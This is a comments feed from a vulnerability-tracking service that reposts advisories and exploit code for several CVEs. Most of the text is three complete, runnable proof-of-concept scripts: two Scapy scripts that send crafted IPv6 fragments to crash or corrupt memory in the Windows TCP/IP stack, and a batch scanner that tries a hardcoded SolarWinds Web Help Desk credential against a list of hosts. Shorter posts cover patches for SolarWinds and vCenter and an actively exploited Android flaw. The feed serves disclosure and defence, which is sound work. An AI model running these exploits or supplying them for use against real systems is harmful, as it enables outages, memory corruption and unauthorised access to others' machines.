Vulnerability Lookup, most recent comments feed: https://vulnerability.circl.lu/comments/feed (Vulnerability Lookup, info@circl.lu; feed updated 2024-11-12T00:33:59.510950+00:00).

## Analysis of a Windows IPv6 Fragmentation Vulnerability: CVE-2021-24086

Comment by Cédric Bonhomme (http://vulnerability.circl.lu/user/cedric): https://vulnerability.circl.lu/comment/e58954bd-8b24-451b-9853-c16202937347

[Analysis of a denial of service vulnerability affecting the IPv6 stack of Windows](https://blog.quarkslab.com/analysis-of-a-windows-ipv6-fragmentation-vulnerability-cve-2021-24086.html).
This issue, whose root cause can be found in the mishandling of IPv6 fragments, was patched by Microsoft in their February 2021 security bulletin.
### Proof of Concept
```python
import sys
import random
from scapy.all import *

FRAGMENT_SIZE = 0x400
LAYER4_FRAG_OFFSET = 0x8
NEXT_HEADER_IPV6_ROUTE = 43
NEXT_HEADER_IPV6_FRAG = 44
NEXT_HEADER_IPV6_ICMP = 58


def get_layer4():
    er = ICMPv6EchoRequest(data = "PoC for CVE-2021-24086")
    er.cksum = 0xa472
    return raw(er)


def get_inner_packet(target_addr):
    inner_frag_id = random.randint(0, 0xffffffff)
    print("**** inner_frag_id: 0x{:x}".format(inner_frag_id))
    raw_er = get_layer4()
    # 0x1ffa Routing headers == 0xffd0 bytes
    routes = raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_ROUTE)) * (0xffd0//8 - 1)
    routes += raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_FRAG))
    # First inner fragment header: offset=0, more=1
    FH = IPv6ExtHdrFragment(offset = 0, m=1, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP)
    return routes + raw(FH) + raw_er[:LAYER4_FRAG_OFFSET], inner_frag_id


def send_last_inner_fragment(target_addr, inner_frag_id):
    raw_er = get_layer4()
    ip = IPv6(dst = target_addr)
    # Second (and last) inner fragment header: offset=1, more=0
    FH = IPv6ExtHdrFragment(offset = LAYER4_FRAG_OFFSET // 8, m=0, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP)
    send(ip/FH/raw_er[LAYER4_FRAG_OFFSET:])


def trigger(target_addr):
    inner_packet, inner_frag_id = get_inner_packet(target_addr)
    ip = IPv6(dst = target_addr)
    hopbyhop = IPv6ExtHdrHopByHop(nh = NEXT_HEADER_IPV6_FRAG)
    outer_frag_id = random.randint(0, 0xffffffff)

    fragmentable_part = []
    for i in range(len(inner_packet) // FRAGMENT_SIZE):
        fragmentable_part.append(inner_packet[i * FRAGMENT_SIZE: (i+1) * FRAGMENT_SIZE])
    if len(inner_packet) % FRAGMENT_SIZE:
        fragmentable_part.append(inner_packet[(len(fragmentable_part)) * FRAGMENT_SIZE:])

    print("Preparing frags...")
    frag_offset = 0
    frags_to_send = []
    is_first = True
    for i in range(len(fragmentable_part)):
        if i == len(fragmentable_part) - 1:
            more = 0
        else:
            more = 1
        FH = IPv6ExtHdrFragment(offset = frag_offset // 8, m=more, id=outer_frag_id, nh = NEXT_HEADER_IPV6_ROUTE)
        blob = raw(FH/fragmentable_part[i])
        frag_offset += FRAGMENT_SIZE
        frags_to_send.append(ip/hopbyhop/blob)

    print("Sending {} frags...".format(len(frags_to_send)))
    for frag in frags_to_send:
        send(frag)

    print("Now sending the last inner fragment to trigger the bug...")
    send_last_inner_fragment(target_addr, inner_frag_id)


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: cve-2021-24086.py <IPv6 addr>')
        sys.exit(1)
    trigger(sys.argv[1])
```

Published 2024-08-30T12:27:27.331911+00:00.

## Proof of Concept for CVE-2024-38063 - Remote Code Execution Vulnerability in tcpip.sys

Comment by Cédric Bonhomme (http://vulnerability.circl.lu/user/cedric): https://vulnerability.circl.lu/comment/4be2fca3-59f3-437e-a4db-7c0b2f8acb81

[Proof of Concept for CVE-2024-38063](https://github.com/ynwarcs/CVE-2024-38063), an RCE in tcpip.sys patched on August 13th 2024.
An [analysis of the vulnerability](https://malwaretech.com/2024/08/exploiting-CVE-2024-38063.html) was published on August 27, 2024 by Marcus Hutchins.
The PoC was published on GitHub on August 24, 2024.
### Implementation
Implementation details are available on [GitHub](https://github.com/ynwarcs/CVE-2024-38063/blob/main/script/cve-2024-38063.py).
```python
from scapy.all import *
import time

iface=''
ip_addr=''
mac_addr=''
num_tries=20
num_batches=20


def get_packets_with_mac(i):
    frag_id = 0xdebac1e + i
    first = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
    second = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa'
    third = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1)
    return [first, second, third]


def get_packets(i):
    if mac_addr != '':
        return get_packets_with_mac(i)
    frag_id = 0xdebac1e + i
    first = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
    second = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa'
    third = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1)
    return [first, second, third]


final_ps = []
for _ in range(num_batches):
    for i in range(num_tries):
        final_ps += get_packets(i) + get_packets(i)

print("Sending packets")
if mac_addr != '':
    sendp(final_ps, iface)
else:
    send(final_ps, iface)

for i in range(60):
    print(f"Memory corruption will be triggered in {60-i} seconds", end='\r')
    time.sleep(1)
print("")
```

Published 2024-08-30T12:36:21.633241+00:00.

## Proof-of-Concept

Comment by Cédric Bonhomme (http://vulnerability.circl.lu/user/cedric): https://vulnerability.circl.lu/comment/20187f45-138c-48ba-b11f-52dc3ddfd69e

A PoC is available here: https://github.com/fa-rrel/CVE-2024-28987-POC
```python
import argparse
import base64
import requests

# Created by Ghost sec.

RED = "\033[91m"
GREEN = "\033[92m"
BOLD = "\033[1m"
RESET = "\033[0m"

ascii_art = f"""
{BOLD}{RED}
______ __ __
/ \ / | / |
/$$$$$$ |$$ |____ ______ _______ _$$ |_ _______ ______ _______
$$ | _$$/ $$ \ / \ / |/ $$ | / | / \ / |
$$ |/ |$$$$$$$ |/$$$$$$ |/$$$$$$$/ $$$$$$/ /$$$$$$$/ /$$$$$$ |/$$$$$$$/
$$ |$$$$ |$$ | $$ |$$ | $$ |$$ \ $$ | __ $$ \ $$ $$ |$$ |
$$ \__$$ |$$ | $$ |$$ \__$$ | $$$$$$ | $$ |/ | $$$$$$ |$$$$$$$$/ $$ \_____
$$ $$/ $$ | $$ |$$ $$/ / $$/ $$ $$/ / $$/ $$ |$$ |
$$$$$$/ $$/ $$/ $$$$$$/ $$$$$$$/ $$$$/ $$$$$$$/ $$$$$$$/ $$$$$$$/
PROOF OF CONCEPT CVE-2024-28987 || SCANNING VULNERABILITY POC || github.com/fa-rrel
{RESET}
"""

print(ascii_art)


def get_basic_auth_header(username, password):
    credentials = f"{username}:{password}"
    base64_credentials = base64.b64encode(credentials.encode()).decode('utf-8')
    return {'Authorization': f'Basic {base64_credentials}'}


def scan_target(hostname):
    # Ensure hostname does not have trailing slashes
    hostname = hostname.strip().rstrip('/')
    url = f"http://{hostname}/helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/"
    # Print formatted URL for debugging
    print(f"{BOLD}[*] Scanning URL: {url}{RESET}")
    headers = get_basic_auth_header("helpdeskIntegrationUser", "dev-C4F8025E7")
    headers['Content-Type'] = 'application/x-www-form-urlencoded'
    try:
        response = requests.get(url, headers=headers, timeout=10)
        if response.status_code == 200 and 'displayClient' in response.text and 'shortDetail' in response.text:
            print(f"{BOLD}{GREEN}[+] Vulnerability confirmed on {hostname} with username: 'helpdeskIntegrationUser' and password: 'dev-C4F8025E7'{RESET}")
        else:
            print(f"{BOLD}{RED}[-] No vulnerability detected on {hostname}{RESET}")
    except requests.RequestException:
        # Modify this line to just print "Not vulnerable" instead of the error details
        print(f"{BOLD}{RED}[-] Not vulnerable on {hostname}{RESET}")


def scan_targets_from_file(file_path):
    try:
        with open(file_path, 'r') as file:
            targets = file.readlines()
        if not targets:
            print(f"{BOLD}{RED}[!] No targets found in file{RESET}")
            return
        for target in targets:
            target = target.strip()
            if target:
                scan_target(target)
    except FileNotFoundError:
        print(f"{BOLD}{RED}[!] File {file_path} not found{RESET}")
    except Exception as e:
        print(f"{BOLD}{RED}[!] An error occurred: {e}{RESET}")


def main():
    parser = argparse.ArgumentParser(description="CVE-2024-28987 Scanner - SolarWinds Web Help Desk Hardcoded Credential")
    parser.add_argument('-f', '--file', type=str, required=True, help='File containing list of targets')
    args = parser.parse_args()
    scan_targets_from_file(args.file)


if __name__ == "__main__":
    main()
```

Published 2024-10-18T22:23:49.363557+00:00.

## Availability of a patch

Comment by Cédric Bonhomme (http://vulnerability.circl.lu/user/cedric): https://vulnerability.circl.lu/comment/f9ef410e-5884-4a57-a0d5-a3a16d9ff8fa

The company released [a patch](https://solarwindscore.my.site.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2?language=en_US) in Web Help Desk version 12.8.3 HF2, which addresses this vulnerability. Users are strongly advised to update their software to this version or later to protect against this flaw.

Published 2024-10-18T22:26:03.012172+00:00.

## Patches released previously did not completely mitigate the vulnerability

Comment by Cédric Bonhomme (http://vulnerability.circl.lu/user/cedric): https://vulnerability.circl.lu/comment/a3186180-3808-47e1-8347-071389b4f994

VMware has determined that the vCenter patches released previously did not completely mitigate the vulnerability.
https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968

Published 2024-10-22T13:20:32.036514+00:00.

## Google Warns of Actively Exploited CVE-2024-43093 Vulnerability in Android System

Comment by Cédric Bonhomme (http://vulnerability.circl.lu/user/cedric): https://vulnerability.circl.lu/comment/a57c1b41-602a-4340-b6bf-c7e95751f645

> « Nov 05, 2024, Ravie Lakshmanan, Mobile Security / Vulnerability
>
> Google has warned that a security flaw impacting its Android operating system has come under active exploitation in the wild.
>
> The vulnerability, tracked as CVE-2024-43093, has been described as a privilege escalation flaw in the Android Framework component that could result in unauthorized access to "Android/data," "Android/obb," and "Android/sandbox" directories, and their respective sub-directories, according to a code commit message. »

[Android Security Bulletin November 2024](https://source.android.com/docs/security/bulletin/2024-11-01)

Published 2024-11-08T08:49:29.657124+00:00.